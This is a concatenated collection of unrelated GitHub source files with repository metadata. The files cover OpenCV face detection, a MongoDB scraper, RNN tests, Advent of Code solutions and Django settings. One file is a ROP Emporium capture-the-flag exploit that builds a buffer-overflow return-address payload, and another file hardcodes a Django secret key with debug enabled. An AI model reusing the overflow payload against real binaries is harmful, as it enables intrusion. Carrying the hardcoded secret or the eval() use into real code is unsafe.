fig.suptitle('Generated Topology Optimization SE predictions')
for ax_row in axs:
for ax in ax_row:
ax.set_xticks([])
ax.set_yticks([])
for idx, sample in enumerate(validation_samples):
initial_SE = sample['initial_SE'].type_as(next(model.parameters()))
final_SE = sample['final_SE'].type_as(next(model.parameters()))
final_D = sample['final_D'].type_as(next(model.parameters()))
prediction_D = model(torch.cat((initial_SE, initial_D), 0).unsqueeze(0))
if isinstance(prediction_SE, tuple):
prediction_D = prediction_D[1]
axs[idx][0].imshow(log_normalization(initial_SE).cpu().detach().squeeze().numpy(), cmap=plt.cm.jet, interpolation='nearest')
axs[idx][1].imshow((1-initial_D.cpu().detach().squeeze().numpy()), vmin=0, vmax=1, cmap=plt.cm.gray, interpolation='nearest')
axs[idx][2].imshow((1-final_D.cpu().detach().squeeze().numpy()), vmin=0, vmax=1, cmap=plt.cm.gray, interpolation='nearest')
axs[idx][3].imshow((1-prediction_D.cpu().detach().squeeze().numpy()), vmin=0, vmax=1, cmap=plt.cm.gray, interpolation='nearest')
tensorboard.add_figure('Predicted Density', fig, epoch)
| [
"noreply@github.com"
] | ajignasu.noreply@github.com |
b8f563c1e26d8a2b93bdc796c7fc26a658a14232 | a60193f1bbca46110c97a0e519636d0d8ca7e98d | /树莓派人脸识别/人脸识别/代码/FaceDataction.py | 47f6ce4d676818493865a350da2b97b3e6343ef8 | [] | no_license | wen1949/raspbian | 33fb67d459ac17da651986736816c503e7ff46ad | 363d60ef6c9790ff62f872ebd51fe3d51a87f031 | refs/heads/main | 2023-02-04T18:04:58.809840 | 2020-12-19T12:18:37 | 2020-12-19T12:18:37 | 303,564,841 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,574 | py | import numpy as np
import cv2
# 人脸识别分类器
faceCascade = cv2.CascadeClassifier(r'C:\pytho3\Lib\site-packages\cv2\data\haarcascade_frontalface_default.xml')
# 识别眼睛的分类器
eyeCascade = cv2.CascadeClassifier(r'C:\pytho3\Lib\site-packages\cv2\data\haarcascade_eye.xml')
# 开启摄像头
cap = cv2.VideoCapture(0)
ok = True
while ok:
# 读取摄像头中的图像,ok为是否读取成功的判断参数
ok, img = cap.read()
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) # 转换成灰度图像
#frame = cv2.flip(img,1)
# 人脸检测
faces = faceCascade.detectMultiScale(
gray,
scaleFactor=1.2,
minNeighbors=5,
minSize=(100, 100)
)
# 在检测人脸的基础上检测眼睛
for (x, y, w, h) in faces:
fac_gray = gray[y: (y + h), x: (x + w)]
result = []
eyes = eyeCascade.detectMultiScale(
fac_gray, 1.3, 2)
# 眼睛坐标的换算,将相对位置换成绝对位置
for (ex, ey, ew, eh) in eyes:
result.append((x + ex, y + ey, ew, eh))
# 画矩形
for (x, y, w, h) in faces:
cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 2)
for (ex, ey, ew, eh) in result:
cv2.rectangle(img, (ex, ey), (ex + ew, ey + eh), (0, 255, 0), 2)
cv2.imshow('video', img) #保持画面持续
k = cv2.waitKey(1)
if k == 27: # press 'ESC' to quit
break
cap.release() #关闭相机
cv2.destroyAllWindows() | [
"noreply@github.com"
] | wen1949.noreply@github.com |
929b2e9e0f29eaedbe1824ef8ae472aa8a69823b | 39f4a2db88c327be0f2711563f9c4614413ddb3d | /scraper/runner.py | 7873ca74c0062821b3cac06b51341ba737bf60cd | [] | no_license | KrishNLP/2017_highlights | 83a7909b4be81ba662692c22a701da25d77f3a37 | 22b7fc6bbeb0ac831c53a5f152c3a33558f25368 | refs/heads/master | 2021-08-31T03:57:44.546430 | 2017-12-20T08:53:24 | 2017-12-20T08:53:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,541 | py | import pandas as pd
import json
import re
from mask import masked_domain
from mask import masked_domain
import csv
import random
import sys
sys.path.insert(0, '../../mongo_toolkit')
from q_to_csv import get_cursor
from itertools import chain
from pymongo import InsertOne, UpdateOne
from pymongo.errors import BulkWriteError
from bson.objectid import ObjectId
import time
from pprint import pprint
def cueBulkWrite(cursor, q, batch_size):
modified = 0
writeConcern = ''
try:
results = cursor.bulk_write(q, ordered = False)
results = results.bulk_api_result
print (results)
modified += results['nModified']
except BulkWriteError as bwe:
writeConcern = bwe.details
modified += bwe['nModified']
def updateDoc(): #refresh instance
updateDoc = {
"descriptionFrom" : '',
"description" : '',
'OldDescription' : '',
}
return updateDoc
def dotNotationGet(document, field):
current = ''
for item in field.split('.'):
current = current.get(item) if current else document.get(item)
return current
def pipeline(org, locations, methods = [], doTest = False):
found = False
foundMethod = False
for m in methods:
mfunc = eval(m) # dangerous method but appropriate for scripting
if not found:
found = mfunc(org, locations, test = doTest)
foundMethod = m
return found, re.sub('source', '',foundMethod, re.I)
def generateGeographicKeys(sample):
# get geo values associated with location based on field structure
locCues = []
if isinstance(sample, dict):
signatureLocationKeys = ['location.country.name.common', 'location.name']
for slk in signatureLocationKeys:
locCues.append(dotNotationGet(sample, slk))
else:
signatureLocationKeys = ['location', 'focusedCountry']
locCues = [sample[x] for x in signatureLocationKeys]
return locCues
def replaceVal(location, collection, assertkey = 'descriptionFrom', uniquekey = ['crunchbaseUUID'],\
batch_size = 30, limit = False, locationHelpers = [],\
projectkeys = [], update = False, printResponses = False): #pass several unique find keys if necessary
if update:
print ('Update set to True. Writing...')
localeQuery = {"$or":[ {"location.name": location}, {"location": location}], assertkey : {"$exists" : False}}
defaultProjected = {'_id' : 1, 'name' : 1, 'description' : 1, 'location' : 1, 'focussedCountry' : 1, 'scraperlog' :1}
affirmProjected = {**defaultProjected, **{k:1 for k in uniquekey + projectkeys}}
shellCursor = get_cursor(collection = collection)
allRecords = shellCursor.find(localeQuery, affirmProjected)
allRecords = list(allRecords)
if allRecords:
limitmsg = 'with limit: %s' % limit if limit else 'without limit'
print ('Query matched with %s records. Beginning update sequence %s!\n' % (len(allRecords), limitmsg))
start = time.time()
first = allRecords[0]
locationCues = generateGeographicKeys(first) + locationHelpers
if locationCues:
print ('Identified geographical search terms: %s' % str(locationCues))
totalModified = 0
bulkQueue = []
allRecords = allRecords if not limit else allRecords[:limit]
for item in allRecords:
item = dict(item)
if len(bulkQueue) == batch_size and update is True:
result = cueBulkWrite(shellCursor, bulkQueue, batch_size)
totalModified += result
bulkQueue = [] #refresh
companyName = item.get('name')
matchOn = {"name" : companyName, "_id" : item['_id']}
foundReplacementDSC = False
new = updateDoc()
if assertkey not in item.keys(): #condition not necessary, query already matches docs without
foundDSC, method = pipeline(companyName, locationCues, doTest = printResponses)
if foundDSC:
similaritytest = item.get('description')
if similaritytest:
similaritytest = similaritytest.lower().strip()
else:
similaritytest = 'void'
if foundDSC.lower().strip() not in similaritytest:
print ('%s found replacement description for %s!' % (method, companyName))
foundReplacementDSC = foundDSC
new['descriptionFrom'] = method
else:
print ('%s"s description is the same!' % companyName)
else:
print ('')
# print ('No description candidate found for %s! Retaining CB default!' % companyName)
if foundReplacementDSC:
new['description'] = foundReplacementDSC
new['OldDescription'] = item.get('description')
print ('Proposed %s' % json.dumps({**new, **{'name' : companyName}}, indent =4))
bulkQueue.append(UpdateOne(matchOn, {"$set" : new}))
if bulkQueue and update is True:
bulkremainder = cueBulkWrite(shellCursor, bulkQueue, len(bulkQueue))
totalModified += bulkremainder
print ('Modified %s / %s' % (totalModified, len(allRecords)))
print ('\n', '-' * 50, '\n')
print ('Completed in %s seconds' % str(int(time.time() - start)))
passParams = {
"assertkey" : "descriptionFrom" ,
"uniquekey" : ["crunchbaseUUID"],
"batch_size" : 30,
"limit" : False,
"projectkeys" : [],
"update" : True,
"locationHelpers" : ["Korea"],
"printResponses" : False
}
"""
Params
-----------
location = case sensitive
assertKey = field exclusion condition for update
uniqueKey = key least likely to be modified - akin to _id and valuable for queries where string fields commonly fail w/ index conflicts
update = False: non-write run printing relevant document updates, True: Write
responseTest = print responses codes
locationHelpers = manual add fields auto signatureKeys for regex match
"""
replaceVal('seoul',collection = 'ShellImportCompanies', **passParams)
| [
"bhavish@oddup.com"
] | bhavish@oddup.com |
07684dae8331e4090c1d7c0b30f6d7355bdf19e3 | 0a3627e849caf21a0385079dea5bf81d4a281b72 | /ret2win32/pwngetshell.py | b3855cdd460b10fec5f32763e9e33a89877fc403 | [] | no_license | surajsinghbisht054/ROP-Emporium-walkthrough-collection | 7e0b3e4aadb4bf4a901c3788fe9fe8a56d047f0d | 4e9ac3f732c6af5ae5fd65e6ca7e3964fc8a3790 | refs/heads/master | 2020-04-14T13:45:04.356322 | 2019-01-02T19:01:39 | 2019-01-02T19:01:39 | 163,877,814 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,283 | py | #!/usr/bin/python
from struct import pack
import pwn
# ==================================================
# Usages: (python exp.py; cat) | ./binaryName
# =================================================
#+ ------------------------------------------------------------------ +
#= +----------------------------------------------------------------+ =
#= | | =
#= | _____ ___________ _____ | =
#= | / ___/ ___| ___ \ | __ \ | =
#= | \ `--.\ `--.| |_/ / | | \/_ __ ___ _ _ _ __ | =
#= | `--. \`--. \ ___ \ | | __| '__/ _ \| | | | '_ \ | =
#= | /\__/ /\__/ / |_/ / | |_\ \ | | (_) | |_| | |_) | | =
#= | \____/\____/\____/ \____/_| \___/ \__,_| .__/ | =
#= | | | | =
#= | |_| | =
#= +----------------------------------------------------------------+ =
#= +----------------------------------------------------------------+ =
#= | | =
#= | surajsinghbisht054@gmail.com | =
#= | www.bitforestinfo.com | =
#= | | =
#= | Try Smart, Try Hard & Don't Cheat | =
#= +----------------------------------------------------------------+ =
#+ ------------------------------------------------------------------ +
#pwn.context.log_level='debug'
#b = pwn.process('./ret2win32')
#b.recvuntil('>')
# 004 0x00000430 0x08048430 GLOBAL FUNC 16 imp.system
# ?v reloc.fgets
# 0x804a010
#
#
#
# ?v reloc.puts
# 0x804a014
#
# ?v sym.pwnme
# 0x80485f6
#
# ?v sym.imp.puts
# 0x8048420
t_function = 0x08048400 # printf
args = 0x8048710
load = ''
load += pack('I',t_function)
load += 'AAAA' #pack('I', )
load += pack('I', args )
# Buffer
pay = ''
pay += 'A'*40
pay += 'BBBB' # EBP
pay += load # EIP
print pay
#b = pwn.process('./ret2win32')
#b.recvuntil('>')
#b.sendline(pay)
#print pwn.hexdump(b.readall())
#pwn.gdb.attach(b)
#b.interactive()
| [
"surajsinghbisht054@gmail.com"
] | surajsinghbisht054@gmail.com |
4f57161c30458a93931767f1b0f4df2765d5d82c | a39e2f98fc610a0d06e7d91b000e91fe0dea5e95 | /category/urls.py | b7f0963c580771b5cc197f90006724e6745ffb68 | [] | no_license | Muslim2209/SmartERP | 91b093471a98911020732b1df5ee5585f815c6f4 | c669890bbbb3e6026db68f24ab4cb650296ff759 | refs/heads/main | 2023-01-27T19:29:10.030166 | 2020-12-07T13:28:03 | 2020-12-07T13:28:03 | 319,320,536 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | from django.urls import path
from category.views import CategoryListView, CategoryUpdateView, CategoryAddView
app_name = 'category'
urlpatterns = [
# path('', CategoryListView.as_view(), name='list'),
# path('<str:item>/list/', CategoryListView.as_view(), name='list'),
# path('<int:pk>/sub/', CategoryListView.as_view(), name='child_list'),
# path('<int:pk>/', CategoryUpdateView.as_view(), name='edit'),
# path('add/', CategoryAddView.as_view(), name='add'),
]
| [
"abdulhakiym2209@google.com"
] | abdulhakiym2209@google.com |
079c47d145a50adbf7c83122dc856c72fc5d5458 | 95b5e122844c73c025854b254251d9977322c6bf | /peaks/migrations/0003_peak_coordinates.py | 2251acbb5cdd18742dcec1c8d0f78738af7208ec | [] | no_license | romainver/PeakViewerAPI | 6f513f02afd0c4a69883fd06acd8015837455ab4 | b5dc5786522ce354b159621ad793271350f753d2 | refs/heads/main | 2023-03-27T04:11:50.115949 | 2021-03-29T07:54:03 | 2021-03-29T07:54:03 | 352,408,596 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 534 | py | # Generated by Django 3.1.7 on 2021-03-27 22:58
import django.contrib.gis.db.models.fields
from django.db import migrations
from django.contrib.gis.geos import Point
class Migration(migrations.Migration):
dependencies = [
('peaks', '0002_record'),
]
operations = [
migrations.AddField(
model_name='peak',
name='coordinates',
field=django.contrib.gis.db.models.fields.PointField(default=Point(5, 23), srid=4326),
preserve_default=False,
),
]
| [
"romain.verhaeghe@viacesi.fr"
] | romain.verhaeghe@viacesi.fr |
4d07b308dded69b4b85b776431306f9c85df7afa | d60977270b100b0b4a744e694d9b2604fd7f0a1b | /learning_users/basic_app/models.py | 0fb10bd6f3b2735ecd8ffbd3d00d7a9ce0d1d348 | [] | no_license | DenverAkshay/django-deployment-example | 185b4cdc8154eb61c8bcf73f670a1812266ce296 | c8010111455184de6ce4ba0210a50c9842219f77 | refs/heads/master | 2020-03-31T18:20:44.781313 | 2018-10-11T05:47:18 | 2018-10-11T05:47:18 | 152,455,325 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 367 | py | from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class UserProfileInfo(models.Model):
user = models.OneToOneField(User,on_delete=models.CASCADE)
#extras
portfolio = models.URLField(blank = True)
profile_pic = models.ImageField(blank=True)
def __str__(self):
return self.user.username
| [
"denverbastian@gmail.com"
] | denverbastian@gmail.com |
69d8543de7c843eaf096b7ca8e5d79c4c75c6bd7 | 73fd7cb82fa5abcbdaa0025b97fb943abba53f44 | /test/layer/rnn_test.py | d2f2ab6f30e2ac47173deb904333a169ff105eec | [] | no_license | huxinran/cnn | 6956fa3c675db23e377886a19646e202cfcbfc11 | e3d6166665d0d83246fd2097b9f6e0c14315c2b0 | refs/heads/master | 2021-09-04T02:19:54.227106 | 2017-12-31T14:22:18 | 2017-12-31T14:22:18 | 113,939,086 | 0 | 1 | null | 2017-12-31T14:22:20 | 2017-12-12T03:34:29 | Python | UTF-8 | Python | false | false | 1,786 | py | import unittest
import numpy as np
import sys
sys.path.append('C:\\Users\\Xinran\\Desktop\\cnn\\src\\layer\\')
sys.path.append('C:\\Users\\Xinran\\Desktop\\cnn\\src\\')
from rnn import RNNLayer as RNN
import utils
class TestRNNLayer(unittest.TestCase):
def test_init(self):
config = {
'dim_hidden' : 10
, 'len' : 2
}
l = RNN(config)
pass
def test_accept(self):
config = {
'dim_hidden' : 10
, 'len' : 2
}
l = RNN(config)
l.accept([26])
pass
def test_forward(self):
config = {
'dim_hidden' : 10
, 'len' : 2
}
l = RNN(config)
l.accept([26])
x = [np.zeros([26])] * 2
x[0][0] = 1.0
x[1][1] = 1.0
l.forward(x)
pass
def test_backward(self):
config = {
'dim_hidden' : 10
, 'len' : 2
}
l = RNN(config)
l.accept([26])
x = [np.zeros([26])] * 2
x[0][0] = 1.0
x[1][1] = 1.0
y = l.forward(x)
dy = [None] * 2
loss, dy[0] = utils.cross_entropy(utils.softmax(y[0]), np.array([0]))
loss, dy[1] = utils.cross_entropy(utils.softmax(y[1]), np.array([1]))
dW, dU, dV = l.backward(dy)
def test_fit(self):
config = {
'dim_hidden' : 10
, 'len' : 2
, 'step_size' : 0.01
}
l = RNN(config)
l.accept([26])
x = [np.zeros([26])] * 2
x[0][0] = 1.0
x[1][1] = 1.0
y = np.array([1, 2])
l.fit(x, y, 100, config)
def test_repr(self):
pass
if __name__ == "__main__":
unittest.main() | [
"huxinran427@gmail.com"
] | huxinran427@gmail.com |
1374558a2bbe4c328f01c9fab0de7f1e38f900e0 | ba834139d9e608e093b3407eec382ef3eece652e | /2015/09/09.py | 7130b806107a206552bc4d39bbc7037705a5b77b | [] | no_license | pberczi/advent-of-code | 815e044193a769fba0829d6720fbe1ec40d83b6d | ce3470bcb5e240eee3b0eee76f7ceed5c75c0b44 | refs/heads/master | 2021-06-09T06:29:27.475941 | 2016-12-26T22:44:19 | 2016-12-26T22:44:19 | 75,329,586 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,055 | py | #!/usr/bin/python
import argparse
from itertools import permutations
# parse command line args
parser = argparse.ArgumentParser()
parser.add_argument('-p', '--problem', metavar='n', type=int, default=1,
help='part of the question to solve')
parser.add_argument('input', metavar='input_path', type=str, nargs='?', default='input.txt',
help='path to input file')
args = parser.parse_args()
data = []
with open(args.input, 'r') as f:
data = f.read().splitlines()
travel_times = {}
places = set()
for line in data:
route = line.split()
src = route[0]
dst = route[2]
time = int(route[4])
places.add(src)
places.add(dst)
travel_times[tuple(sorted([src, dst]))] = time
routes = list(permutations(places))
min_time = float('Inf')
max_time = 0
for route in routes:
time = 0
for i in range(1,len(route)):
src_dst = tuple(sorted([route[i-1], route[i]]))
time += travel_times[src_dst]
if time < min_time:
min_time = time
if time > max_time:
max_time = time
print min_time, max_time | [
"p.berczi@gmail.com"
] | p.berczi@gmail.com |
a637e242d3a3557ae14b117e2d53f7f0034ed278 | de02d12703cf628017f31bca1c4079b5b3ab3af7 | /python-tech-demos/src/timer/time_mode.py | 2f82836f62d5fd088cfc6aa90981d8ac111f2b02 | [] | no_license | chrischendev/python-learn-demos | 0d13cd7a5d2de01dbf93f1793716a8375d33069c | 5d66e8a83b2985164395d57cb82eda8a23af4cee | refs/heads/master | 2021-07-07T13:47:03.049444 | 2020-10-10T03:13:06 | 2020-10-10T03:13:06 | 191,339,157 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 156 | py | import time
# 阻塞式
while True:
print(time.strftime('%Y-%m-%d %X', time.localtime()), end=' : ')
print('定时任务执行')
time.sleep(1)
| [
"chrischen2018@163.com"
] | chrischen2018@163.com |
b0b1e8a074a52cef0b2bfb11b185ac680f4fe1f8 | ad75e772fd189aa1661ab0fec443a544b04994cd | /test_sample.py | 9decac360d8c1e1ea29821461ddda71d02c99569 | [
"MIT"
] | permissive | raymond-liao/web_ui_test_sample | 9fefd63e33f4012f21e06494476cf4464e7a6a61 | 8a6cc9b54b5f728af7ef0725dea42d759bd115d0 | refs/heads/master | 2023-05-11T13:05:04.653624 | 2020-03-10T08:48:58 | 2020-03-10T08:48:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 248 | py | import pytest
# pytest in action – test_pytest_example_1.py
def function_1(var):
return var + 1
@pytest.mark.sample
def test_success():
assert function_1(4) == 5
@pytest.mark.sample
def test_failure():
assert function_1(2) == 5
| [
"chengjia_liao@hotmail.com"
] | chengjia_liao@hotmail.com |
567e41f86400c398cb9844473478b4a7db3d831c | 956dbba4c050d75e12858bdac1504c31d4032958 | /CloudBridge/urls.py | 0d8be54e30125fbfec40bcf807346d142b3bee13 | [] | no_license | RastogiAbhijeet/CloudBridge | 406d7de6dbec8610256f2d4110e432df3bccd11e | 799c194d487a616ebde7876aa24c5382d0e72adf | refs/heads/master | 2021-04-09T13:27:43.644028 | 2018-03-16T14:14:52 | 2018-03-16T14:14:52 | 125,500,934 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 346 | py | from django.contrib import admin
from django.urls import path
from django.conf.urls import url, include
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('admin/', admin.site.urls),
url(r'', include('filesharing.urls'))
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
| [
"abhijeetrastogi1997@gmail.com"
] | abhijeetrastogi1997@gmail.com |
ac9d24c57aa168fc4f49c1f1c4ecab87237bdec8 | 1d2c2bdb95136cd0732389f7947bbc9fe4c7ca44 | /sanic-web/apps/__init__.py | e0026afe27ff6e92c5c61c5314a7aaa24136395b | [] | no_license | da-peng/sanic-nginx-docker-example | a6004b646bce04978fa3bfd375cb0c5c743ee003 | 3978ba925d3d321e7ed45b90e2245cb87cc06e2f | refs/heads/master | 2022-08-16T02:25:51.111311 | 2019-08-27T11:22:50 | 2019-08-27T11:22:50 | 130,952,894 | 1 | 1 | null | 2022-08-06T05:59:17 | 2018-04-25T04:59:20 | Python | UTF-8 | Python | false | false | 1,018 | py | #encoding=utf-8
from sanic import Sanic
# 环境变量配置测试,必须在app初始化/也就是就是启动前配置,
# 启动后,配置的环境变量需要重新重启服务
# from os import environ
# environ["MYAPP_CUSTOM_CONF"] = "42"
# environ["MYAPP_DEBUG"] = 'True'
# environ["MYAPP_ENV"] = 'DEV'
# 初始化app,初始化的时候将配置一起配了
app = Sanic(__name__,load_env='MYAPP_')
from apps.config import CONFIG
# 以Object的形式 设置 配置包含(公共/默认配置,环境配置)
app.config.from_object(CONFIG)
# 估计要注册蓝本前进行环境配置
# 从系统环境变量拿配置,如DB配置,全部以MYAPP_开头
# 或者设置 SANIC_PREFIX = "SANIC_" 来设置环境变量前缀名,
# 还没有试过,看别人有这么写过
# print(__name__)
# import * 包含的模块,变量;不包含在内的 import package时不导入
__all__ = ['urls','tasks','models','middle_ware','error']
# all必须放在 from apps import * 前面
from apps import *
| [
"xiaopeng.wu@qlchat.com"
] | xiaopeng.wu@qlchat.com |
8eacfffbda0654c3f08674730203074899e94cf0 | c40337ca035167e610d6599af236b2c6b1ba1fbb | /app/src/domain/schedule/model.py | f530810331f766ed590e4436e02d4d14fcd864c0 | [] | no_license | oksanaperekipska/staff-planning | a7f45af7dacadbdc59ee84b6d6e6b649bb23cbdf | 898d866ce93b7023452c05c1a9e0abb18b764bb0 | refs/heads/master | 2023-03-23T09:30:37.772993 | 2021-03-24T21:38:55 | 2021-03-24T21:38:55 | 351,229,672 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 106 | py | from pydantic import BaseModel
class Schedule(BaseModel):
id: int
airport_id: int
name: str
| [
"a.sidko@idev-hub.com"
] | a.sidko@idev-hub.com |
3a79f008e87da29da9382df753c959c1227d5abf | 591b1135f35313aeb3a5334004c55f65dec2ec77 | /2018/d05/p1.py | 4c1a799bada5f21e234d17f6ffe10b0c4f6ff298 | [] | no_license | KristobalJunta/aoc | cbc2b33f059b8815bcb82614d1a1317fdcce4fc7 | fd952427e6311d0d545dd7da3766c97aa4ee60bf | refs/heads/master | 2023-06-21T23:29:47.272089 | 2023-06-08T14:41:23 | 2023-06-08T14:44:42 | 159,981,944 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 477 | py | from collections import Counter
def react(p, units):
for unit in units:
p = p.replace(unit+unit.upper(), '').replace(unit.upper()+unit, '')
return p
with open('input.txt') as infile:
polymer = infile.read().strip()
print(polymer)
units = dict(Counter(polymer.lower())).keys()
while True:
new_polymer = react(polymer, units)
if new_polymer != polymer:
polymer = new_polymer
else:
break
print(polymer)
print(len(polymer))
| [
"junta.kristobal@gmail.com"
] | junta.kristobal@gmail.com |
5d432b73e44a812c919798eb761e1993c584b700 | 4479f2dea600996f898b5fc8d820131cdd788995 | /accounts/migrations/0012_auto_20170630_1044.py | b63877cd0c1b6e30be32c3a47da17d1dd52c3b25 | [] | no_license | Drachenflo/audioQuery | fda661f3e1d9101f64db03395092697c783977d2 | 205520063573bf42f4531eda38bc8f29356ed0b0 | refs/heads/master | 2020-12-02T21:05:35.538325 | 2017-07-04T21:29:50 | 2017-07-04T21:29:50 | 96,253,739 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 560 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-06-30 08:44
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0011_auto_20170630_1008'),
]
operations = [
migrations.AlterField(
model_name='button',
name='preset',
field=models.CharField(choices=[('preset_reset', 1), ('preset_player', 1), ('preset_overlap', 2), ('preset_replay', 3)], default=0, max_length=2),
),
]
| [
"drachenflo@gmail.com"
] | drachenflo@gmail.com |
28cd395893c2d0508aed6884a9918e01db028f70 | b357eca98cc3ccb09ec55c7a9ad9c215694ae0cb | /shop/mainapp/migrations/0002_notebook_smartphone.py | c1f6d8a79e6814c3fcda58ff2a25e3c49adad84a | [] | no_license | irynaludanova/e-shop | 1c73b67e4439f0327e074af4290ac4fcf08ec633 | 473e8941d71fe0f95d10ca748ed37f64f54a211a | refs/heads/main | 2023-04-26T06:25:08.649261 | 2021-05-27T12:22:08 | 2021-05-27T12:22:08 | 370,921,306 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,736 | py | # Generated by Django 3.1.7 on 2021-05-24 10:17
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('mainapp', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Smartphone',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255, verbose_name='Наименование')),
('slug', models.SlugField(unique=True)),
('image', models.ImageField(upload_to='', verbose_name='Изображение')),
('description', models.TextField(null=True, verbose_name='Описание')),
('price', models.DecimalField(decimal_places=2, max_digits=9, verbose_name='Цена')),
('diagonal', models.CharField(max_length=255, verbose_name='Диагональ')),
('display_type', models.CharField(max_length=255, verbose_name='Тип дисплея')),
('resolution', models.CharField(max_length=255, verbose_name='Разрешение экрана')),
('accum_volume', models.CharField(max_length=255, verbose_name='Объем батареи')),
('ram', models.CharField(max_length=255, verbose_name='Оперативная память')),
('cd', models.BooleanField(default=True)),
('sd_volume_max', models.CharField(max_length=255, verbose_name='Максимальный объём встраиваемой памяти')),
('main_cam_mp', models.CharField(max_length=255, verbose_name='Главная камера')),
('frontal_cam_mp', models.CharField(max_length=255, verbose_name='Фронтальная камера')),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mainapp.category', verbose_name='Категория')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Notebook',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255, verbose_name='Наименование')),
('slug', models.SlugField(unique=True)),
('image', models.ImageField(upload_to='', verbose_name='Изображение')),
('description', models.TextField(null=True, verbose_name='Описание')),
('price', models.DecimalField(decimal_places=2, max_digits=9, verbose_name='Цена')),
('diagonal', models.CharField(max_length=255, verbose_name='Диагональ')),
('display_type', models.CharField(max_length=255, verbose_name='Тип дисплея')),
('processor_freq', models.CharField(max_length=255, verbose_name='Частота процессора')),
('ram', models.CharField(max_length=255, verbose_name='Оперативная память')),
('video', models.CharField(max_length=255, verbose_name='Видеокарта')),
('time_without_charge', models.CharField(max_length=255, verbose_name='Время работы аккумулятора')),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mainapp.category', verbose_name='Категория')),
],
options={
'abstract': False,
},
),
]
| [
"irynaludanova@gmail.com"
] | irynaludanova@gmail.com |
69dc78d34f604ca8e3bef292bca231a51d485009 | 0c6189ee24daa1fa25351f1a9c51e50d004910bf | /mysite/settings.py | 6406c14e6e09b4aea9a62f299f4e6db3e3bff411 | [
"MIT"
] | permissive | Abbos0511/django-celery-rabbitmq | abc02d7538accaef29e10ded9db7ec41602b9a4a | a02fe7aecb6302b30654de7af9848933a105d3bf | refs/heads/main | 2023-06-30T14:56:58.172201 | 2021-08-09T10:26:36 | 2021-08-09T10:26:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,562 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 3.2.6.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-xt(wa+@b&s90m_vf15v!e)2_^tob%d9&z!%j!&4*hcy30q(pem'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'core',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [BASE_DIR / 'templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
